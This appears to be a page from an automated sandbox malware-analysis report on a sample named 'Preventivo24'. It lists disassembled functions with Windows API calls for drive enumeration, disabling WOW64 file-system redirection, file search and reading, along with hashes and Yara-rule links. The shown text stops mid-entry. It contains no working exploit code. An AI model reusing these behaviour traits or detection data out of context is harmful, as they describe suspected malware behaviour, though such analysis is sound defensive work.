Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 4936a01efca40320c3e02ee198153515b13d49ef1a5ac52486b93102712fec82
Instruction ID: 882969e6637f49714c049e19601a9abd3781fdf8706665f72b6202deb975fdb7
Opcode Fuzzy Hash: 4936a01efca40320c3e02ee198153515b13d49ef1a5ac52486b93102712fec82
Instruction Fuzzy Hash: DED21771E082298BDB65CF68DD807EAB7B5EB44304F1441EAD41EE7280EB75AE85CF41

Uniqueness

Uniqueness Score: -1.00%

Function 00B52400 Relevance: 9.2, APIs: 4, Strings: 1, Instructions: 463COMMON

Download Yara Rule

APIs

Part of subcall function 009EB400: GetProcessHeap.KERNEL32 ref: 009EB455

GetLogicalDriveStringsW.KERNEL32(00000064,?), ref: 00B52640
GetDriveTypeW.KERNEL32(?), ref: 00B5265A
Wow64DisableWow64FsRedirection.KERNEL32(00000000,00000000), ref: 00B526F5
Wow64RevertWow64FsRedirection.KERNEL32(00000000,00000000), ref: 00B52996

Strings

]%!, xrefs: 00B525D8

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: Wow64$DriveRedirection$DisableHeapLogicalProcessRevertStringsType
String ID: ]%!
API String ID: 4157823300-1069524040
Opcode ID: 883441a62e382b29bbc510ed502857788b7b65d80e5925cef651502e43b862a5
Instruction ID: 63e7670144adc37b1c59130c95d46917e3af4cd4834845ae08c637d6372a801c
Opcode Fuzzy Hash: 883441a62e382b29bbc510ed502857788b7b65d80e5925cef651502e43b862a5
Instruction Fuzzy Hash: 7802DF30A012598FDB25DB68CC94BADB7F5EF59310F0481E9E81AA7391DB709E85CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00B68B30 Relevance: 9.2, APIs: 6, Instructions: 203fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,00000000,-00000010,?,26FBC52C,?,?,00000000), ref: 00B68BFC
FindNextFileW.KERNEL32(?,00000000,?,00000000), ref: 00B68C17

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: FileFind$FirstNext
String ID:
API String ID: 1690352074-0
Opcode ID: 87c7adb798bd233cc3aa2ca366aac5d7841d441bdaf48575ab201ffa5297f910
Instruction ID: c4f028628c72a6ca74108c4b5389120f3f5f33840a880b622c51d5985870ad3b
Opcode Fuzzy Hash: 87c7adb798bd233cc3aa2ca366aac5d7841d441bdaf48575ab201ffa5297f910
Instruction Fuzzy Hash: CD81787190064D9FDB11DFA8CC48BEDBBF8FF08320F148699E825A7291DB75AA05CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00BEA1CE Relevance: 9.0, APIs: 6, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000C,00BEA0EA,00000000,?,00BEA282,?,?,?,?), ref: 00BEA1D0
GetProcessHeap.KERNEL32(00000008,00000008,00000000,00000000,?,?,?,?), ref: 00BEA1F7
HeapAlloc.KERNEL32(00000000,?,?,?,?), ref: 00BEA1FE
InitializeSListHead.KERNEL32(00000000,?,?,?,?), ref: 00BEA20B
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?), ref: 00BEA220
HeapFree.KERNEL32(00000000,?,?,?,?), ref: 00BEA227

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: Heap$Process$AllocFeatureFreeHeadInitializeListPresentProcessor
String ID:
API String ID: 1475849761-0
Opcode ID: 8acad2f35cf549574875f29ffacad4705588eefb604cb51c95840ab47c6b19bd
Instruction ID: 2757ef48ce2bf64b25532254c56af700266f9d4dd551d2c0bce269001a3e00aa
Opcode Fuzzy Hash: 8acad2f35cf549574875f29ffacad4705588eefb604cb51c95840ab47c6b19bd
Instruction Fuzzy Hash: 9CF04F716042419BD7209F79AC08B1A77ECEB95B52F040578F68AD3250EB31D4819772

Uniqueness

Uniqueness Score: -1.00%

Function 00B6CED0 Relevance: 7.9, APIs: 5, Instructions: 368fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,26FBC52C,?,00B5E190,00000000,?,?,?,00000000,00C64AE5), ref: 00B6CF2D
SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000), ref: 00B6CF62
ReadFile.KERNEL32(00000000,00000000,0000000A,?,00000000), ref: 00B6CF84
ReadFile.KERNEL32(00000000,?,00000005,?,00000000), ref: 00B6D06D
CloseHandle.KERNEL32(00000000), ref: 00B6D17D

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: File$Read$CloseCreateHandlePointer
String ID:
API String ID: 3856724686-0
Opcode ID: 3466b9359426ee4214e390ba74e0cb5142161ba6e0eacd3ce61ecc913b2f45e6
Instruction ID: 99ebb753295015edf5e6c3cef0d56588f709228b37464b845a2c21656cb162be
Opcode Fuzzy Hash: 3466b9359426ee4214e390ba74e0cb5142161ba6e0eacd3ce61ecc913b2f45e6
Instruction Fuzzy Hash: F9C1BF36A01209DBCB15CB68C854BBEBBF5FF49720F14419DE816A7391DB75AD01CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00BD8F00 Relevance: 7.5, APIs: 4, Instructions: 1546COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 463e1ec025b73953ad8cb69ef9cafe42a2c0ded82043f1fe4bb0bd67fb17b6dc
Instruction ID: 5551957cfd83738836e45ed6dd06409904f32eedf5a9dd75d205665071649a7b
Opcode Fuzzy Hash: 463e1ec025b73953ad8cb69ef9cafe42a2c0ded82043f1fe4bb0bd67fb17b6dc
Instruction Fuzzy Hash: C0D29C70A00249DFDB14DF68C884BAEBBF5FF49304F14819AE809AB3A1D775AD45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00C029F3 Relevance: 6.3, APIs: 4, Instructions: 337COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00C02A80

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 277a97f598be04f346a0cad4ad723d285b0e98bd717225965e2f9d5dff28776d
Instruction ID: cff2f7f29420c157ac448d92ed2f49b8f0c9b42efc2f05f818801032153d9aa0
Opcode Fuzzy Hash: 277a97f598be04f346a0cad4ad723d285b0e98bd717225965e2f9d5dff28776d
Instruction Fuzzy Hash: 50B18C32A002459FFB15CF68C8857FEBBE4EF45300F24416AE915AB3C2D2349E41DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B53790 Relevance: 6.2, APIs: 4, Instructions: 228COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0cc0bf78c14874261d3b259955217ed46e79609bfe69a013ad7f27e3b3ff1e32
Instruction ID: 032468b988b7e83f52dc7e70cf0417f1ba9709262e170940104a5b5771ca9e8c
Opcode Fuzzy Hash: 0cc0bf78c14874261d3b259955217ed46e79609bfe69a013ad7f27e3b3ff1e32
Instruction Fuzzy Hash: 6B917A719012589BDB60DB28C849B9DBBF5EF48324F1482D9E829A7392DB709E84CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00B1CDD0 Relevance: 6.2, APIs: 4, Instructions: 163fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,00000000,00000000), ref: 00B1CE62
FindFirstFileW.KERNEL32(?,00000000,0000002A), ref: 00B1CF06
FindClose.KERNEL32(00000000), ref: 00B1CF30
FindClose.KERNEL32(00000000), ref: 00B1CF89

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 41ae6e1dfdcbbad4899c3be6b836a359340e2148932b0ea38cee055b632a1251
Instruction ID: ce01a1cf5a18da4adddf8242e9ba64ecabc2053e954268b24c379f3b5ad8ebda
Opcode Fuzzy Hash: 41ae6e1dfdcbbad4899c3be6b836a359340e2148932b0ea38cee055b632a1251
Instruction Fuzzy Hash: E4512271940249DFCF20DF64C8487EEBBF5FF55324FA48699E81597280E730AA8ACB50

Uniqueness

Uniqueness Score: -1.00%

Function 00A0B090 Relevance: 5.7, Strings: 4, Instructions: 704COMMON

Download Yara Rule

Strings

AI_CONTROL_VISUAL_STYLE, xrefs: 00A0B0EA
AI_CONTROL_VISUAL_STYLE_EX, xrefs: 00A0B555
AI_NO_BORDER_NORMAL, xrefs: 00A0B185
AI_NO_BORDER_HOVER, xrefs: 00A0B23A

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID:
String ID: AI_CONTROL_VISUAL_STYLE$AI_CONTROL_VISUAL_STYLE_EX$AI_NO_BORDER_HOVER$AI_NO_BORDER_NORMAL
API String ID: 0-932585912
Opcode ID: 3aae2970aa22b69e1a33106fb5da03e757f7175939d173d9420f38a6c8fe70ba
Instruction ID: fd18d8c376913aca6221b709bd65d5335c6bf9cc684a5c56995720436dacb3dd
Opcode Fuzzy Hash: 3aae2970aa22b69e1a33106fb5da03e757f7175939d173d9420f38a6c8fe70ba
Instruction Fuzzy Hash: 6C421371E102288BDB18CF68DD94BAEB7F1EF85300F148259E455AB3D1C774AE45CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A1E4E0 Relevance: 5.4, Strings: 4, Instructions: 378COMMON

Download Yara Rule

Strings

<> ", xrefs: 00A1E601
Show, xrefs: 00A1E7E0
Hide, xrefs: 00A1E5A4, 00A1E5C5
= ", xrefs: 00A1E818

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID:
String ID: <> "$ = "$Hide$Show
API String ID: 0-289022205
Opcode ID: da03bf6c326f3acbc1b01ab5a439e026239b5a8f8a05b1ea2a4cafcdaac210cc
Instruction ID: 403ab5c1767c2ec1f5a00342892d7a2c5d7b428d5fcf2f5e29773e89993b84f5
Opcode Fuzzy Hash: da03bf6c326f3acbc1b01ab5a439e026239b5a8f8a05b1ea2a4cafcdaac210cc
Instruction Fuzzy Hash: 6C022770D00299CFDB25DF64C855BAEB7B1BF55304F1085DAE41AAB291EB706E84CF60

Uniqueness

Uniqueness Score: -1.00%

Function 00B4B480 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109COMMON

Download Yara Rule

APIs

Part of subcall function 009EB400: GetProcessHeap.KERNEL32 ref: 009EB455

GetLocaleInfoW.KERNEL32(00000000,00000002,00CA2730,00000000), ref: 00B4B501
GetLocaleInfoW.KERNEL32(00000000,00000002,?,-00000001,00000078,-00000001), ref: 00B4B53D

Strings

%d-%s, xrefs: 00B4B547

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: InfoLocale$HeapProcess
String ID: %d-%s
API String ID: 3246605784-1781338863
Opcode ID: 001c525cdeb65f0eb00773e66eedc15e0fdf620c5d11d7592f3a74813685d3b0
Instruction ID: 522866f3db85a00a874bddc99d4747d85656c9c04ec94c29170274127a852080
Opcode Fuzzy Hash: 001c525cdeb65f0eb00773e66eedc15e0fdf620c5d11d7592f3a74813685d3b0
Instruction Fuzzy Hash: 2A31BC72A04219ABCB01DF99CC49BAEFBB4FF48324F104169F515AB391DB75AA01CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00A0F180 Relevance: 5.3, Strings: 4, Instructions: 337COMMON

Download Yara Rule

Strings

ProductCode, xrefs: 00A0F438, 00A0F485, 00A0F486
MultipleInstancesProps, xrefs: 00A0F2C0
MultipleInstances, xrefs: 00A0F1C2
OldProductCode, xrefs: 00A0F4BD, 00A0F4EF, 00A0F50F, 00A0F510

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID:
String ID: MultipleInstances$MultipleInstancesProps$OldProductCode$ProductCode
API String ID: 0-469785651
Opcode ID: 96304c234784859efec6d836796be9eaf9efb5f93c0858ab53243751c4681024
Instruction ID: ed52625f9e457bca5eecf9eeadf09c62b2be2af8beab7567d2d527f6c7a6d88e
Opcode Fuzzy Hash: 96304c234784859efec6d836796be9eaf9efb5f93c0858ab53243751c4681024
Instruction Fuzzy Hash: 72C1C235A0021ACFCB28DF58E8906BBB3B2FF95314B154169D9127FA85D731AD46CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00BE7833 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

VirtualQuery.KERNEL32(80000000,00BE7778,0000001C,00BE796D,00000000,?,?,?,?,?,?,?,00BE7778,00000004,00D2E438,00BE79FD), ref: 00BE7844
GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,00BE7778,00000004,00D2E438,00BE79FD), ref: 00BE785F

Strings

D, xrefs: 00BE7853

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: InfoQuerySystemVirtual
String ID: D
API String ID: 401686933-2746444292
Opcode ID: b91d12ee96c3eef0700638eba9d1d3a3af7618fcdced07af6e565c4de9b1a02a
Instruction ID: 62949eac47aac8a68fdf6a108d86c1c5d0eda20b89bb0d3130a5113570d32a4d
